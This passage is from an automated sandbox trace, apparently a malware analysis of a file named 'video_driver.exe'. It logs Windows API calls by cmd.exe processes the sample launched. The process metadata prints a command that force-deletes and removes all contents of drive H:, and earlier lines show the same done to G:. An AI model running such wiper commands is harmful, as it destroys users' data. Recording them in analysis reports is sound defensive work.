lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.437] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.437] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0058.437] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0058.437] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0058.437] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0058.437] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0058.437] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0058.437] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0058.437] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0058.437] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0058.437] GetProcessHeap () returned 0x640000 [0058.437] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x652bd0 | out: hHeap=0x640000) returned 1 [0058.437] GetEnvironmentStringsW () returned 0x652310* [0058.437] GetProcessHeap () returned 0x640000 [0058.437] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xae2) returned 0x654c70 [0058.438] FreeEnvironmentStringsW (penv=0x652310) returned 1 [0058.438] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.438] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.438] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0058.438] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0058.438] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0058.438] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0058.438] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0058.438] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0058.438] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0058.438] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0058.438] GetProcessHeap () returned 0x640000 [0058.438] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x54) returned 0x6517c8 [0058.438] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff690 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0058.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ff690, lpFilePart=0x3ff68c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff68c*="Desktop") returned 0x25 [0058.438] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0058.438] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff40c | out: lpFindFileData=0x3ff40c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x655760 [0058.439] FindClose (in: hFindFile=0x655760 | out: hFindFile=0x655760) returned 1 [0058.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ff40c | out: lpFindFileData=0x3ff40c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x655760 [0058.439] FindClose (in: hFindFile=0x655760 | out: hFindFile=0x655760) returned 1 [0058.439] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0058.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ff40c | out: lpFindFileData=0x3ff40c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x655760 [0058.439] FindClose (in: hFindFile=0x655760 | out: hFindFile=0x655760) returned 1 [0058.439] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0058.439] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0058.439] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0058.439] GetProcessHeap () returned 0x640000 [0058.439] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x654c70 | out: hHeap=0x640000) returned 1 [0058.439] GetEnvironmentStringsW () returned 0x654180* [0058.439] GetProcessHeap () returned 0x640000 [0058.439] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xb36) returned 0x655fa0 [0058.440] FreeEnvironmentStringsW (penv=0x654180) returned 1 [0058.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0058.440] GetProcessHeap () returned 0x640000 [0058.440] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x6517c8 | out: hHeap=0x640000) returned 1 [0058.440] GetProcessHeap () returned 0x640000 [0058.440] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x400e) returned 0x656ae0 [0058.440] GetProcessHeap () returned 0x640000 [0058.440] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa0) returned 0x652e50 [0058.440] GetProcessHeap () returned 0x640000 [0058.440] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x656ae0 | out: hHeap=0x640000) returned 1 [0058.440] GetConsoleOutputCP () returned 0x1b5 [0058.440] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.440] GetUserDefaultLCID () returned 0x409 [0058.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0058.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ff7d0, cchData=128 | out: lpLCData="0") returned 2 [0058.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ff7d0, cchData=128 | out: lpLCData="0") returned 2 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ff7d0, cchData=128 | out: lpLCData="1") returned 2 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0058.442] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0058.442] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0058.443] GetProcessHeap () returned 0x640000 [0058.443] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x20c) returned 0x652ef8 [0058.443] GetConsoleTitleW (in: lpConsoleTitle=0x652ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0058.443] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.444] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0058.444] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0058.444] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0058.444] GetProcessHeap () returned 0x640000 [0058.444] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x400a) returned 0x656ae0 [0058.444] GetProcessHeap () returned 0x640000 [0058.444] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4008) returned 0x65aaf8 [0058.445] GetProcessHeap () returned 0x640000 [0058.445] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1a) returned 0x6557e0 [0058.445] GetEnvironmentVariableW (in: lpName="p IN (\"G", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="CD") returned 13 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="ERRORLEVEL") returned 11 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="CMDEXTVERSION") returned 13 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="CMDCMDLINE") returned 13 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="DATE") returned 12 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="TIME") returned -4 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="RANDOM") returned -2 [0058.445] _wcsicmp (_String1="p IN (\"G", _String2="HIGHESTNUMANODENUMBER") returned 8 [0058.445] GetProcessHeap () returned 0x640000 [0058.445] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x6557e0 | out: hHeap=0x640000) returned 1 [0058.445] GetProcessHeap () returned 0x640000 [0058.445] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x65aaf8 | out: hHeap=0x640000) returned 1 [0058.445] GetProcessHeap () returned 0x640000 [0058.445] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4008) returned 0x65aaf8 [0058.445] GetProcessHeap () returned 0x640000 [0058.445] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x65aaf8 | out: hHeap=0x640000) returned 1 [0058.445] GetProcessHeap () returned 0x640000 [0058.445] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x656ae0 | out: hHeap=0x640000) returned 1 [0058.446] _wcsicmp (_String1="if", _String2=")") returned 64 [0058.446] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0058.446] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0058.446] _wcsicmp (_String1="IF", _String2="if") returned 0 [0058.446] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0058.446] GetProcessHeap () returned 0x640000 [0058.446] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x653110 [0058.446] GetProcessHeap () returned 0x640000 [0058.446] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xe) returned 0x64ffc0 [0058.446] GetProcessHeap () returned 0x640000 [0058.446] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x20) returned 0x6557e0 [0058.447] GetProcessHeap () returned 0x640000 [0058.447] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6557e0, Size=0x16) returned 0x651800 [0058.447] GetProcessHeap () returned 0x640000 [0058.447] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x651800) returned 0x16 [0058.447] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0058.448] GetProcessHeap () returned 0x640000 [0058.448] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x653170 [0058.448] GetProcessHeap () returned 0x640000 [0058.448] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x14) returned 0x6531d0 [0058.448] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0058.448] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0058.448] GetProcessHeap () returned 0x640000 [0058.448] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x12) returned 0x6531f0 [0058.448] GetProcessHeap () returned 0x640000 [0058.448] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1c) returned 0x6557e0 [0058.448] GetProcessHeap () returned 0x640000 [0058.448] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6557e0, Size=0x14) returned 0x653210 [0058.448] GetProcessHeap () returned 0x640000 [0058.448] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x653210) returned 0x14 [0058.449] _wcsicmp (_String1="del", _String2=")") returned 59 [0058.449] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0058.449] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0058.449] _wcsicmp (_String1="IF", _String2="del") returned 5 [0058.449] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0058.449] _wcsicmp (_String1="REM", _String2="del") returned 14 [0058.449] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0058.449] GetProcessHeap () returned 0x640000 [0058.449] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x653230 [0058.449] GetProcessHeap () returned 0x640000 [0058.449] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x10) returned 0x64ffd8 [0058.449] GetProcessHeap () returned 0x640000 [0058.449] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x28) returned 0x653290 [0058.450] GetProcessHeap () returned 0x640000 [0058.450] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x6532c0 [0058.451] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0058.451] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0058.451] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0058.451] GetProcessHeap () returned 0x640000 [0058.451] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x653320 [0058.451] GetProcessHeap () returned 0x640000 [0058.451] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x44) returned 0x653380 [0058.451] GetProcessHeap () returned 0x640000 [0058.451] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x14) returned 0x6533d0 [0058.451] GetProcessHeap () returned 0x640000 [0058.451] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6533d0, Size=0x12) returned 0x6533d0 [0058.451] GetProcessHeap () returned 0x640000 [0058.451] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6533d0) returned 0x12 [0058.452] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0058.452] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0058.452] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0058.452] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0058.452] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0058.452] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0058.452] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0058.453] GetProcessHeap () returned 0x640000 [0058.453] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x12) returned 0x6533f0 [0058.453] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0058.453] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0058.453] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0058.454] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0058.454] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0058.454] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0058.454] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0058.454] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0058.454] GetProcessHeap () returned 0x640000 [0058.454] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x653410 [0058.454] GetProcessHeap () returned 0x640000 [0058.454] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x14) returned 0x653470 [0058.454] GetProcessHeap () returned 0x640000 [0058.454] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x20) returned 0x6557e0 [0058.456] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0058.457] GetFullPathNameW (in: lpFileName="G:", nBufferLength=0x208, lpBuffer=0x3ff4c0, lpFilePart=0x3ff26c | out: lpBuffer="G:\\", lpFilePart=0x3ff26c*=0x0) returned 0x3 [0058.457] wcsncmp (_String1="G:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -21 [0058.462] GetFileAttributesW (lpFileName="G:\\" (normalized: "g:")) returned 0xffffffff [0058.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.462] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.462] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0058.462] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.462] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0058.462] SetConsoleInputExeNameW () returned 0x1 [0058.462] GetConsoleOutputCP () returned 0x1b5 [0058.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.463] exit (_Code=0) Process: id = "27" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x430eb000" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0x918 [0058.754] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9b4 | out: lpSystemTimeAsFileTime=0x16f9b4*(dwLowDateTime=0x2829300, dwHighDateTime=0x1d62400)) [0058.754] GetCurrentProcessId () returned 0x908 [0058.754] GetCurrentThreadId () returned 0x918 [0058.754] GetTickCount () returned 0x1146da2 [0058.754] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9ac | out: lpPerformanceCount=0x16f9ac*=17888754627) returned 1 [0058.757] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0058.757] __set_app_type (_Type=0x1) [0058.757] __p__fmode () returned 0x770331f4 [0058.758] __p__commode () returned 0x770331fc [0058.758] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0058.758] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0058.758] GetCurrentThreadId () returned 0x918 [0058.758] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x918) returned 0x60 [0058.758] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.758] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0058.758] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.759] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0058.759] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f944 | out: phkResult=0x16f944*=0x0) returned 0x2 [0058.760] VirtualQuery (in: lpAddress=0x16f97b, lpBuffer=0x16f914, dwLength=0x1c | out: lpBuffer=0x16f914*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.760] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f914, dwLength=0x1c | out: lpBuffer=0x16f914*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0058.760] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f914, dwLength=0x1c | out: lpBuffer=0x16f914*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0058.760] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f914, dwLength=0x1c | out: lpBuffer=0x16f914*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.760] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f914, dwLength=0x1c | out: lpBuffer=0x16f914*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0058.760] GetConsoleOutputCP () returned 0x1b5 [0058.760] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.760] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0058.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.760] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0058.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.760] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0058.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.761] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.761] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.761] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0058.761] GetEnvironmentStringsW () returned 0x3420f8* [0058.761] GetProcessHeap () returned 0x330000 [0058.761] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xaca) returned 0x342bd0 [0058.762] FreeEnvironmentStringsW (penv=0x3420f8) returned 1 [0058.762] GetProcessHeap () returned 0x330000 [0058.762] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4) returned 0x341898 [0058.762] GetEnvironmentStringsW () returned 0x3420f8* [0058.762] GetProcessHeap () returned 0x330000 [0058.762] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xaca) returned 0x3436a8 [0058.762] FreeEnvironmentStringsW (penv=0x3420f8) returned 1 [0058.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8b4 | out: phkResult=0x16e8b4*=0x68) returned 0x0 [0058.762] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x0, lpData=0x16e8c0*=0x0, lpcbData=0x16e8b8*=0x1000) returned 0x2 [0058.762] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x1, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.762] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x0, lpData=0x16e8c0*=0x1, lpcbData=0x16e8b8*=0x1000) returned 0x2 [0058.762] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x0, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.762] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x40, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x40, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x0, lpData=0x16e8c0*=0x40, lpcbData=0x16e8b8*=0x1000) returned 0x2 [0058.763] RegCloseKey (hKey=0x68) returned 0x0 [0058.763] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8b4 | out: phkResult=0x16e8b4*=0x68) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x0, lpData=0x16e8c0*=0x40, lpcbData=0x16e8b8*=0x1000) returned 0x2 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x1, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x0, lpData=0x16e8c0*=0x1, lpcbData=0x16e8b8*=0x1000) returned 0x2 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, 